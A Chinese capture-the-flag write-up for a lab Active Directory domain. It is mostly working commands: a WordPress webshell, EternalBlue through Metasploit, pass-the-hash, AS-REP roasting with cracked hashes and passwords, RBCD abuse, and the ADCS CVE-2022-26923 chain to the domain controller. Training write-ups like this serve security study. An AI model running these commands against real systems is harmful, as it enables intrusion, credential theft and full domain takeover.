目录
flag1
flag2
flag3
flag4
flag1
fscan什么也没扫到
访问是个web
dirsearch开扫
访问./wp-admin
弱口令admin:123456登录
编辑主题文件
在header.php中插入一句话木马
header.php位置:https://tw.godaddy.com/help/change-the-header-in-wordpress-26441
蚁剑连接./wp-content/themes/twentytwentyone/header.php
直接读到flag1
flag2
/tmp目录下传fscan和frp,扫内网,搭隧道
./fscan -h 172.22.15.1/24 > ./result.txt
172.22.15.13 XR-DC01
172.22.15.18 80 XR-CA ADCS
172.22.15.24 80,3306 XR-WIN08 MS17-010
172.22.15.26 本机
172.22.15.35 XR-0687
先把24的MS17-010永恒之蓝打了
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
exploit
hashdump抓一下哈希
msf的shell有点问题,直接psexec横向过去
proxychains4 python psexec.py administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk
读到flag2
flag3
访问24的web
弱口令admin:123456登录
后台管理导出模板
之后手动标注一下域用户名
lixiuying@xiaorang.lab
lixiaoliang@xiaorang.lab
zhangyi@xiaorang.lab
jiaxiaoliang@xiaorang.lab
zhangli@xiaorang.lab
zhangwei@xiaorang.lab
liuqiang@xiaorang.lab
wangfang@xiaorang.lab
wangwei@xiaorang.lab
wanglihong@xiaorang.lab
huachunmei@xiaorang.lab
wanghao@xiaorang.lab
zhangxinyu@xiaorang.lab
huzhigang@xiaorang.lab
lihongxia@xiaorang.lab
wangyulan@xiaorang.lab
chenjianhua@xiaorang.lab
一眼AS-ERP Roasting
proxychains4 impacket-GetNPUsers -dc-ip 172.22.15.13 -usersfile username.txt xiaorang.lab/
跑出来两个TGT
$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:669b68c735180f28f200a47ee12cb65e$ee8e4a3edeca0b7e20b8eb1061d4f0a563293e0a20ae49260aa1c29861639c0ccc86b2b3aa5bd26c9f67a080bb2383efb3564ef1a0b91adc9536fe859e1232ae0c20e00764247013d5efed5e6147ddde5aaea6d28ed0e2fbcbb1c8f126bb5c633937582aa621f480d4de56c6f6847728db9c2315e187d8f1dc5d2a58ff58b318e9305f21596937792369f667043ac78249f5e39f092bafb425d83d8a3bf610f74d3b1494c056d38c6b45131ec9b8d3713f8380e9723cc60821558f79d4768947ecdd75335db8a4880f27846390c6ec6067c2df0dab5cadc860e212c8bb028e5bd0f0c2fc783c75d4b9efc7a7
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:581b985d03342b44ffe506620c82002b$7616b4ea9d643421b5fdf0de0cb5c17018d796c09ae8f845831db4efde6b48692faefb8a6f9d12e497124c7f509c1d9c7d249c3eb5a9356a70d248caa1ef72a7abad3aa5acdaf15448f4c74a30d3acae51e9d3b0ebf630fcf28cd0f3029d844b607da8f0afef85c21e6ed76066d8937e38aa61a33b8bbd8d1cd01cdfcfb553468d6c4bdf14dfa402b49ff272b1700699cb0c334fa1a55c04f0cab10094fc20584fa77c47f86371b7eeb85e60ebc1cf4b62d4f314c4c5f4efedfced87a488342915ea795e90de83aebe3946d94300ba861688efd2804138e9ff6bd21473b17a656dc648411f0bb6d6607b2cdc
hashcat爆一下
hashcat -m 18200 --force '$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:669b68c735180f28f200a47ee12cb65e$ee8e4a3edeca0b7e20b8eb1061d4f0a563293e0a20ae49260aa1c29861639c0ccc86b2b3aa5bd26c9f67a080bb2383efb3564ef1a0b91adc9536fe859e1232ae0c20e00764247013d5efed5e6147ddde5aaea6d28ed0e2fbcbb1c8f126bb5c633937582aa621f480d4de56c6f6847728db9c2315e187d8f1dc5d2a58ff58b318e9305f21596937792369f667043ac78249f5e39f092bafb425d83d8a3bf610f74d3b1494c056d38c6b45131ec9b8d3713f8380e9723cc60821558f79d4768947ecdd75335db8a4880f27846390c6ec6067c2df0dab5cadc860e212c8bb028e5bd0f0c2fc783c75d4b9efc7a7' ./rockyou.txt
hashcat -m 18200 --force '$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:581b985d03342b44ffe506620c82002b$7616b4ea9d643421b5fdf0de0cb5c17018d796c09ae8f845831db4efde6b48692faefb8a6f9d12e497124c7f509c1d9c7d249c3eb5a9356a70d248caa1ef72a7abad3aa5acdaf15448f4c74a30d3acae51e9d3b0ebf630fcf28cd0f3029d844b607da8f0afef85c21e6ed76066d8937e38aa61a33b8bbd8d1cd01cdfcfb553468d6c4bdf14dfa402b49ff272b1700699cb0c334fa1a55c04f0cab10094fc20584fa77c47f86371b7eeb85e60ebc1cf4b62d4f314c4c5f4efedfced87a488342915ea795e90de83aebe3946d94300ba861688efd2804138e9ff6bd21473b17a656dc648411f0bb6d6607b2cdc' ./rockyou.txt
爆出来账密
lixiuying@xiaorang.lab/winniethepooh
huachunmei@xiaorang.lab/1qaz2wsx
跑一下bloodhound
proxychains4 bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp
lixiuying 对 XR-0687 具有 GenericWrite 权限
记得先写入/etc/hosts
172.22.15.35 XR-0687.xiaorang.lab
打RBCD
proxychains4 impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'HACK$' -computer-pass '0x401@admin'
proxychains4 impacket-rbcd xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'HACK$'
proxychains4 impacket-getST xiaorang.lab/'HACK$':'0x401@admin' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13
export KRB5CCNAME=Administrator.ccache
proxychains4 impacket-psexec administrator@XR-0687.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13
读到flag3
flag4
接下来打打ADCS,这里是CVE-2022-26923
申请证书模版
proxychains4 certipy-ad account create -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -user Test2 -pass Test1234 -dns 'XR-DC01.xiaorang.lab'
proxychains4 certipy-ad req -u Test2\$@xiaorang.lab -p Test1234 -target 172.22.15.18 -ca "xiaorang-XR-CA-CA" -template Machine
接下来用这个工具
https://github.com/AlmondOffSec/PassTheCert/tree/main/Python
利用上面生成的 pfx 证书配置域控的 RBCD 给上面创建的HACK$
certipy-ad cert -pfx xr-dc01.pfx -nokey -out user.crt
certipy-ad cert -pfx xr-dc01.pfx -nocert -out user.key
proxychains4 python passthecert.py -action whoami -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13
proxychains4 python passthecert.py -action write_rbcd -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'HACK$'
导入票据
proxychains4 impacket-getST xiaorang.lab/HACK\$:0x401@admin -dc-ip 172.22.15.13 -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator
export KRB5CCNAME=Administrator.ccache
直接psexec无密码登录
读到flag4
proxychains4 impacket-psexec xiaorang.lab/Administrator@xr-dc01.xiaorang.lab -k -no-pass -target-ip 172.22.15.13 -codec gbk